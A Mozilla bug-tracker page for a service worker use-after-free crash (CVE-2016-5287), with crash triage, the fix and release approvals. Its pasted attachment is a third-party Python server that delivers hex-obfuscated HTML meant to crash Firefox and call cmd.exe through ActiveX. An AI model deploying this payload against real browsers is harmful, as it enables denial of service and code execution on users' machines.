Closed Bug 1309823 (CVE-2016-5287) Opened 8 years ago Closed 8 years ago

Crash in nsTArray_base<T>::SwapArrayElements<T> | nsTArray_Impl<T>::SwapElements<T> | mozilla::ipc::FileDescriptorSetChild::ForgetFileDescriptors

Categories

(Core :: DOM: Service Workers, defect)

Product:
Core
Component:
DOM: Service Workers
Version:
49 Branch
Platform:
x86
Windows
Type:
defect
Priority:
Not set
Severity:
critical

Tracking

()

Status:
RESOLVED FIXED
Milestone:
mozilla52
Tracking Flags:
Tracking Status
firefox49 + fixed
firefox-esr45 --- unaffected
firefox50 + fixed
firefox51 --- fixed
firefox52 + fixed

People

(Reporter: philipp, Assigned: bkelly)

References

Details

(4 keywords)

Crash Data

Attachments

(2 files)

Forget file descriptors before starting actor destruction. r=billm
2.02 KB, patch
billm
: review+
lizzard
: approval-mozilla-aurora+
lizzard
: approval-mozilla-beta+
lizzard
: approval-mozilla-release+
abillings
: sec-approval+
Details | Diff | Splinter Review
firefox.txt
8.18 KB, text/plain
Details
This bug was filed from the Socorro interface and is report bp-6e8fc599-f021-4b0c-b5a3-cda7d2161013. ============================================================= Crashing Thread (27) Frame Module Signature Source 0 xul.dll nsTArray_base<nsTArrayInfallibleAllocator, nsTArray_CopyWithMemutils>::SwapArrayElements<nsTArrayInfallibleAllocator, nsTArrayInfallibleAllocator>(nsTArray_base<nsTArrayInfallibleAllocator, nsTArray_CopyWithMemutils>&, unsigned int, unsigned int) obj-firefox/dist/include/nsTArray-inl.h:346 1 xul.dll nsTArray_Impl<nsCOMPtr<nsIRunnable>, nsTArrayInfallibleAllocator>::SwapElements<nsTArrayInfallibleAllocator>(nsTArray_Impl<nsCOMPtr<nsIRunnable>, nsTArrayInfallibleAllocator>&) obj-firefox/dist/include/nsTArray.h:1661 2 xul.dll mozilla::ipc::FileDescriptorSetChild::ForgetFileDescriptors(nsTArray<mozilla::ipc::FileDescriptor>&) ipc/glue/FileDescriptorSetChild.cpp:28 3 xul.dll mozilla::ipc::`anonymous namespace'::CleanupIPCStream ipc/glue/IPCStreamUtils.cpp:183 4 xul.dll mozilla::ipc::AutoIPCStream::~AutoIPCStream() ipc/glue/IPCStreamUtils.cpp:343 5 xul.dll mozilla::UniquePtr<mozilla::ipc::AutoIPCStream, mozilla::DefaultDelete<mozilla::ipc::AutoIPCStream> >::reset(mozilla::ipc::AutoIPCStream*) obj-firefox/dist/include/mozilla/UniquePtr.h:342 6 xul.dll mozilla::dom::cache::AutoChildOpArgs::~AutoChildOpArgs() dom/cache/AutoUtils.cpp:141 7 xul.dll mozilla::dom::cache::Cache::Put(mozilla::dom::RequestOrUSVString const&, mozilla::dom::Response&, mozilla::ErrorResult&) dom/cache/Cache.cpp:421 8 xul.dll mozilla::dom::CacheBinding::put obj-firefox/dom/bindings/CacheBinding.cpp:873 9 xul.dll mozilla::dom::CacheBinding::put_promiseWrapper obj-firefox/dom/bindings/CacheBinding.cpp:893 this signature is regressing in 50.0b builds and is mainly happening in the content process. in 50.0b6 they are currently accounting for 3% of all content crashes. some correlations for the signature on 50.0b: (100.0% in signature vs 00.23% overall) address = 0xffffffffe5e5e5e9 (81.98% in signature vs 21.36% overall) "EGL?" in app_notes = true (81.98% in signature vs 21.96% overall) "WebGL?" in app_notes = true (100.0% in signature vs 40.37% overall) reason = EXCEPTION_ACCESS_VIOLATION_READ (72.97% in signature vs 20.35% overall) "EGL+" in app_notes = true (80.18% in signature vs 27.71% overall) dom_ipc_enabled = 1 (72.97% in signature vs 20.83% overall) "WebGL+" in app_notes = true (72.97% in signature vs 21.48% overall) "GL Context+" in app_notes = true (72.97% in signature vs 21.48% overall) "GL Context?" in app_notes = true
the crash first started to appear on 2016-10-10 with various different beta versions though, so some external factor may play into this as well.
based on https://bugzilla.mozilla.org/show_bug.cgi?id=1283823#c26 it may be that the e5e5e5e part of the address is indicative of a security issue, so i'm flagging this as a precaution.
Group: core-security
Flags: needinfo?(dveditz)
Not very useful (very generic) stack, but looks like UAF and something to do with workers and maybe the SW cache.
Group: core-security → dom-core-security
Component: General → DOM: Workers
Flags: needinfo?(dveditz) → needinfo?(bkelly)
Keywords: sec-high, testcase-wanted
Maybe the URLs in the crashes will be useful if this hit different build IDs around the same time. Lots of zalora.co.id
Component: DOM: Workers → DOM: Service Workers
I would have guessed this was introduced in bug 1093357, but that landed in FF49. I think I see the problem, though: if (!aConsumedByIPC) { Unused << fdSetActor->Send__delete__(fdSetActor); } // FileDescriptorSet doesn't clear its fds in its ActorDestroy, so we // unconditionally forget them here. The fds themselves are auto-closed in // ~FileDescriptor since they originated in this process. fdSetActor->ForgetFileDescriptors(fds); We should delete the actor after telling it to forget its file descriptors.
Assignee: nobody → bkelly
Status: NEW → ASSIGNED
Flags: needinfo?(bkelly)
Sylvestre, if we do a point release for FF49, I'd like to have this ride-along. I will have patches up shortly.
Flags: needinfo?(sledru)
I think this is a pretty clear ordering violation. We must call the method on the actor before starting its deletion.
Attachment #8800794 - Flags: review?(wmccloskey)
Attachment #8800794 - Flags: review?(wmccloskey) → review+
ok, we are discussing about a dot release for a js issue, redirecting to liz
Flags: needinfo?(sledru) → needinfo?(lhenry)
This bug has 49 as unaffected. So it doesn't sound like a candidate for a dot release. Also, this should have sec approval though before it lands if you think 51/52 are also affected.
Flags: needinfo?(lhenry)
Comment on attachment 8800794 [details] [diff] [review] Forget file descriptors before starting actor destruction. r=billm [Security approval request comment] How easily could an exploit be constructed based on the patch? Moderately difficult. They would have to understand the implication that Send__delete__() can immediately delete an actor and how this ipc/glue code is called. Do comments in the patch, the check-in comment, or tests included in the patch paint a bulls-eye on the security problem? I don't think the commit message includes any more information then the patch. It references "destruction", but I am moving a method that includes "delete" in its name. Which older supported branches are affected by this flaw? FF49+ If not all supported branches, which bug introduced the flaw? Bug 1093357 Do you have backports for the affected branches? If not, how different, hard to create, and risky will they be? This should apply cleanly. How likely is this patch to cause regressions; how much testing does it need? Minimal risk. Its reordering two calls. We've fixed similar bugs in the past with changes almost identical to this. I've also done a try build with an obscured patch name/message: https://treeherder.mozilla.org/#/jobs?repo=try&revision=e9f99b26d967bfbbd91485cf503dbb78d9aaa429
Attachment #8800794 - Flags: sec-approval?
Attachment #8800794 - Flags: approval-mozilla-release?
Attachment #8800794 - Flags: approval-mozilla-beta?
Attachment #8800794 - Flags: approval-mozilla-aurora?
Liz, it was marked 49 unaffected because the crashes are not showing there. The bug that introduced the flaw did land in FF49, though. If no other point release was happening I probably would not push for one. But I think it would be prudent to do this as a ride-along.
Flags: needinfo?(lhenry)
Based on bug 1093357 I'm going to mark FF49 affected.
status-firefox49: unaffectedaffected
sec-approval+ for trunk. We'll need release management approval for Aurora and Beta patches. I'd like to take it there though.
status-firefox49: affectedwontfix
status-firefox52: ?affected
status-firefox-esr45: --- → unaffected
tracking-firefox50: --- → ?
tracking-firefox51: --- → ?
tracking-firefox52: --- → +
Flags: needinfo?(rkothari)
Attachment #8800794 - Flags: sec-approval? → sec-approval+
Comment on attachment 8800794 [details] [diff] [review] Forget file descriptors before starting actor destruction. r=billm Sec-high, let's take this on release as well as other branches. I am now aiming a dot release for mid-next week.
Flags: needinfo?(lhenry)
Attachment #8800794 - Flags: approval-mozilla-release?
Attachment #8800794 - Flags: approval-mozilla-release+
Attachment #8800794 - Flags: approval-mozilla-beta?
Attachment #8800794 - Flags: approval-mozilla-beta+
Attachment #8800794 - Flags: approval-mozilla-aurora?
Attachment #8800794 - Flags: approval-mozilla-aurora+
went ahead and landed this on inbound to be able to uplift to release branches hopefully before the weekend in https://hg.mozilla.org/integration/mozilla-inbound/rev/e62579becf83fb7b8524bba995af9c94b20c4ec9
Per comment 15. Carsten, thanks for landing!
status-firefox49: wontfixaffected
https://hg.mozilla.org/mozilla-central/rev/e62579becf83
Status: ASSIGNED → RESOLVED
Closed: 8 years ago
status-firefox52: affectedfixed
Resolution: --- → FIXED
Target Milestone: --- → mozilla52
Un-track for 51 as it's fixed.
tracking-firefox51: ? → ---
(In reply to Ritu Kothari (:ritu) from comment #22) > Hi Ben, this is another crash signature that is trending up in Beta50. > https://crash-stats.mozilla.org/signature/?date=%3C2016-10- > 17T17%3A10%3A00%2B00%3A00&date=%3E%3D2016-10- > 10T17%3A10%3A00%2B00%3A00&product=Firefox&version=50. > 0b&signature=nsTArray_base%3CT%3E%3A%3ASwapArrayElements%3CT%3E%20%7C%20nsTAr > ray_Impl%3CT%3E%3A%3ASwapElements%3CT%3E%20%7C%20mozilla%3A%3Aipc%3A%3AFileDe > scriptorSetParent%3A%3AForgetFileDescriptors > > Do you think this is a different problem or it should also be fixed with > this one? It should be fixed with the patches landed here. What beta do we expect this fix to be included in? I thought it would be in 50b7, but maybe I was confused.
Flags: needinfo?(bkelly)
Ah, I see FF50b7 was built from this push: https://hg.mozilla.org/releases/mozilla-beta/rev/6efc0964ec62bc4abfdc4cb1dc7cc461c3238634 Which does not seem to include this bug's patch yet. So I am hopeful both these crashes will be fixed by this patch.
A number of service worker related intermittents seem to have dropped off to zero over the weekend as well. Hoping that those are all fixed by this.
Alias: CVE-2016-5287
FWIW there have been no reports of either crash signature since this was released.
I'm adding the second signature here then. It's strange because it stopped abruptly on 2016-10-17.
Crash Signature: [@ nsTArray_base<T>::SwapArrayElements<T> | nsTArray_Impl<T>::SwapElements<T> | mozilla::ipc::FileDescriptorSetChild::ForgetFileDescriptors] → [@ nsTArray_base<T>::SwapArrayElements<T> | nsTArray_Impl<T>::SwapElements<T> | mozilla::ipc::FileDescriptorSetChild::ForgetFileDescriptors] [@ nsTArray_base<T>::SwapArrayElements<T> | nsTArray_Impl<T>::SwapElements<T> | mozilla::ipc::FileDescriptorSetPa…
Group: dom-core-security
Attached file firefox.txt
#Exploit Title: Mozilla Firefox 49.0.2 Crash #2-11-2016 #Author: sultan albalawi #video :https://www.facebook.com/pentest3/videos/vb.100012552940568/204971129931317/?type=2&theater #it's working with tor browser you can try #Tested on:win7 from BaseHTTPServer import BaseHTTPRequestHandler,HTTPServer host='192.168.88.254' port=8080 i=0 ban= '\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x5c\x20\x20\x20\x2d\x20\x20' ban+='\x2d\x20\x20\x2d\x20\x3c\x73\x65\x72\x76\x65\x72\x3e\x20\x20\x2d' ban+='\x20\x5c\x2d\x2d\x2d\x3c\x20\x2d\x20\x2d\x20\x20\x2d\x20\x2d\x20' ban+='\x20\x2d\x20\x20\x2a\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20' ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20' ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20' ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x2a\x2a\x2a\x0d\x0a\x20\x20\x20' ban+='\x20\x20\x20\x20\x7c\x20\x20\x20\x20\x44\x6f\x63\x5f\x41\x74\x74' ban+='\x61\x63\x6b\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20' ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2a\x2a\x2a' ban+='\x2a\x2a\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x7c\x20\x20\x20\x20' ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20' ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20' ban+='\x20\x20\x20\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x20\x20\x20\x20' ban+='\x20\x20\x20\x76\x20\x20\x20\x20\x20\x20\x20\x20\x60\x20\x60\x2e' ban+='\x20\x20\x20\x20\x2c\x3b\x27\x20\x20\x20\x20\x20\x20\x20\x20\x20' ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2a\x2a\x2a\x2a\x41\x70\x50' ban+='\x2a\x2a\x2a\x2a\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20' ban+='\x20\x20\x20\x20\x20\x20\x60\x2e\x20\x20\x2c\x27\x2f\x20\x2e\x27' ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20' ban+='\x20\x20\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x0d' ban+='\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20' ban+='\x20\x20\x60\x2e\x20\x58\x20\x2f\x2e\x27\x20\x20\x20\x20\x20\x20' ban+='\x20\x20\x20\x20\x20\x20\x20\x2a\x20\x20\x20\x20\x20\x2a\x2a\x2a' ban+='\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x20\x20\x20\x20' ban+='\x20\x20\x20\x2e\x2d\x3b\x2d\x2d\x27\x27\x2d\x2d\x2e\x5f\x60\x20' ban+='\x60\x20\x28\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20' ban+='\x20\x2a\x2a\x2a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x7c\x0d' ban+='\x0a\x20\x20\x20\x20\x20\x2e\x27\x20\x20\x20\x20\x20\x20\x20\x20' ban+='\x20\x20\x20\x2f\x20\x20\x20\x20\x27\x20\x20\x20\x20\x20\x20\x20' ban+='\x20\x20\x20\x20\x20\x2a\x2a\x2a\x2a\x2a\x20\x20\x20\x20\x20\x20' ban+='\x20\x20\x20\x7c\x20\x64\x61\x74\x61\x62\x61\x73\x65\x0d\x0a\x20' ban+='\x20\x20\x20\x20\x3b\x53\x65\x63\x75\x72\x69\x74\x79\x60\x20\x20' ban+='\x27\x20\x30\x20\x20\x30\x20\x27\x20\x20\x20\x20\x20\x20\x20\x20' ban+='\x20\x2a\x2a\x2a\x4e\x45\x54\x2a\x2a\x2a\x20\x20\x20\x20\x20\x20' ban+='\x20\x7c\x0d\x0a\x20\x20\x20\x20\x2c\x20\x20\x20\x20\x20\x20\x20' ban+='\x2c\x20\x20\x20\x20\x27\x20\x20\x7c\x20\x20\x27\x20\x20\x20\x20' ban+='\x20\x20\x20\x20\x20\x20\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x20' ban+='\x20\x20\x20\x20\x20\x20\x5e\x0d\x0a\x20\x2c\x2e\x20\x7c\x20\x20' ban+='\x20\x20\x20\x20\x20\x27\x20\x20\x20\x20\x20\x60\x2e\x5f\x2e\x27' ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x7c' ban+='\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x5e\x2d\x2d\x2d\x5e\x20\x20\x20\x20' ban+='\x20\x20\x20\x20\x20\x20\x2f\x0d\x0a\x20\x3a\x20\x20\x2e\x20\x60' ban+='\x20\x20\x3b\x20\x20\x20\x60\x20\x20\x60\x20\x2d\x2d\x2c\x2e\x2e' ban+='\x5f\x3b\x2d\x2d\x2d\x3e\x20\x20\x20\x20\x20\x20\x20\x20\x20\x7c' ban+='\x20\x20\x20\x20\x20\x20\x20\x27\x2e\x27\x2e\x27\x5f\x5f\x5f\x5f' ban+='\x5f\x5f\x5f\x5f\x20\x2a\x0d\x0a\x20\x20\x27\x20\x60\x20\x20\x20' ban+='\x20\x2c\x20\x20\x20\x29\x20\x20\x20\x2e\x27\x20\x20\x20\x20\x20' ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x5e\x20' ban+='\x20\x20\x20\x20\x20\x20\x20\x7c\x5f\x7c\x20\x46\x69\x72\x65\x77' ban+='\x61\x6c\x6c\x20\x29\x0d\x0a\x20\x20\x20\x20\x20\x60\x2e\x5f\x20' ban+='\x2c\x20\x20\x27\x20\x20\x20\x2f\x5f\x20\x20\x20\x20\x20\x20\x20' ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x7c\x20\x20' ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x7c\x7c\x20\x20\x20\x20' ban+='\x7c\x7c\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x3b\x20\x2c\x27' ban+='\x27\x2d\x2c\x3b\x27\x20\x60\x60\x2d\x5f\x5f\x5f\x5f\x5f\x5f\x5f' ban+='\x5f\x5f\x5f\x5f\x5f\x5f\x5f\x5f\x5f\x5f\x7c\x0d\x0a\x20\x20\x20' ban+='\x20\x20\x20\x20\x20\x20\x60\x60\x2d\x2e\x2e\x5f\x5f\x60\x60\x2d' ban+='\x2d\x60\x20\x20\x20\x20\x20\x20\x20\x69\x70\x73\x20\x20\x20\x20' ban+='\x20\x20\x20\x2d\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x5e' ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2f\x0d\x0a\x20' ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20' ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20' ban+='\x20\x20\x20\x20\x20\x20\x2d\x20\x20\x20\x20\x20\x20\x20\x20\x27' ban+='\x2e\x20\x5f\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2a\x0d\x0a\x20' ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20' ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20' ban+='\x20\x20\x20\x20\x20\x20\x20\x2d\x5f\x5f\x5f\x5f\x5f\x5f\x5f\x20' ban+='\x7c\x5f\x20\x20\x49\x50\x53\x20\x20\x20\x20\x20\x29\x0d\x0a\x20' ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20' ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20' ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20' ban+='\x20\x20\x20\x20\x7c\x7c\x20\x20\x20\x20\x20\x7c\x7c\x0d\x0a\x20' ban+='\n' ban+='\x53\x75\x6c\x74\x61\x6e\x5f\x41\x6c\x62\x61\x6c\x61\x77\x69\n' ban+='\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x66\x61\x63\x65' ban+='\x62\x6f\x6f\x6b\x2e\x63\x6f\x6d\x2f\x70\x65\x6e\x74\x65\x73\x74\x33\n' print ban print "please wait ...." htmlcrach=('''\x3c\x68\x74\x6d\x6c\x3e\x0d\x0a\x3c\x73\x63\x72\x69\x70\x74\x20\x74\x79\x70\x65\x3d\x22\x74\x65\x78\x74\x2f\x6a\x61\x76\x61\x73\x63\x72\x69\x70\x74\x22\x3e\x0d\x0a\x66\x75\x6e\x63\x74\x69\x6f\x6e\x20\x65\x78\x28\x29\x0d\x0a\x7b\x0d\x0a\x76\x61\x72\x20\x6f\x62\x6a\x53\x68\x65\x6c\x6c\x20\x3d\x20\x6e\x65\x77\x20\x41\x63\x74\x69\x76\x65\x58\x4f\x62\x6a\x65\x63\x74\x28\x22\x73\x68\x65\x6c\x6c\x2e\x61\x70\x70\x6c\x69\x63\x61\x74\x69\x6f\x6e\x22\x29\x3b\x0d\x0a\x6f\x62\x6a\x53\x68\x65\x6c\x6c\x2e\x53\x68\x65\x6c\x6c\x45\x78\x65\x63\x75\x74\x65\x28\x22\x63\x6d\x64\x2e\x65\x78\x65\x22\x2c\x20\x22\x63\x64\x20\x43\x3a\x20\x43\x3a\x5c\x5c\x63\x64\x20\x63\x3a\x5c\x5c\x65\x78\x74\x5f\x66\x69\x6c\x65\x20\x6d\x61\x69\x6e\x2e\x65\x78\x65\x20\x74\x65\x73\x74\x2e\x74\x78\x74\x22\x2c\x20\x22\x43\x3a\x5c\x5c\x57\x49\x4e\x44\x4f\x57\x53\x5c\x5c\x73\x79\x73\x74\x65\x6d\x33\x32\x22\x2c\x20\x22\x6f\x70\x65\x6e\x22\x2c\x20\x31\x29\x3b\x0d\x0a\x7d\x0d\x0a\x7b\x0d\x0a\x76\x61\x72\x20\x62\x75\x66\x20\x3d\x20\x22\x22\x3b\x0d\x0a\x66\x6f\x72\x20\x28\x76\x61\x72\x20\x69\x20\x3d\x20\x30\x3b\x20\x69\x20\x3c\x35\x30\x30\x30\x30\x3b\x20\x69\x2b\x2b\x29\x20\x7b\x0d\x0a\x62\x75\x66\x20\x2b\x3d\x20\x22\x41\x22\x3b\x0d\x0a\x7d\x0d\x0a\x76\x61\x72\x20\x62\x75\x66\x66\x20\x3d\x20\x62\x75\x66\x3b\x0d\x0a\x66\x6f\x72\x20\x28\x69\x20\x3d\x20\x30\x3b\x20\x69\x20\x3c\x35\x30\x30\x30\x3b\x20\x69\x2b\x2b\x29\x20\x7b\x0d\x0a\x62\x75\x66\x66\x20\x2b\x3d\x20\x62\x75\x66\x3b\x0d\x0a\x7d\x0d\x0a\x64\x6f\x63\x75\x6d\x65\x6e\x74\x2e\x74\x69\x74\x6c\x65\x20\x3d\x20\x62\x75\x66\x66\x3b\x0d\x0a\x7d\x0d\x0a\x3c\x2f\x73\x63\x72\x69\x70\x74\x3e\x0d\x0a\x3c\x2f\x61\x3e\x3c\x2f\x62\x6f\x64\x79\x3e\x3c\x2f\x68\x74\x6d\x6c\x3e''') while i <= 5000: i+=1 ban+=htmlcrach class Req(BaseHTTPRequestHandler): def do_GET(self): self.send_response(200) self.send_header('Content-type','text/html') self.end_headers() self.wfile.write(htmlcrach) class runHTTP(HTTPServer): def __init__(self,host,port): ipadd=(host,port) HTTPServer.__init__(self,ipadd,Req) def createfile(): global filecreate filecreate = "test.html" open(filecreate, "wb").write(htmlcrach) print ('file done: {}').format(filecreate) def start(): global filecreate ser=runHTTP(host,port) print "http://{}:{}/{}".format(host,port,filecreate) ser.serve_forever() createfile() start()
Flags: needinfo?(madperson)
Mozilla Firefox 49.0.1 - Denial of Service #Date: 15 Oct 2016 https://www.exploit-db.com/exploits/40536/
Flags: needinfo?(madperson)
Please file a new bug if you think you've found something new.
Flags: needinfo?(sultanalbalawi00)
(In reply to Marco Castelluccio [:marco] from comment #30) > Please file a new bug if you think you've found something new. I did https://bugzilla.mozilla.org/show_bug.cgi?id=1314862 thanks
Flags: needinfo?(sultanalbalawi00)
You need to log in before you can comment on or make changes to this bug.

Attachment

General

Creator:
Created:
Updated:
Size: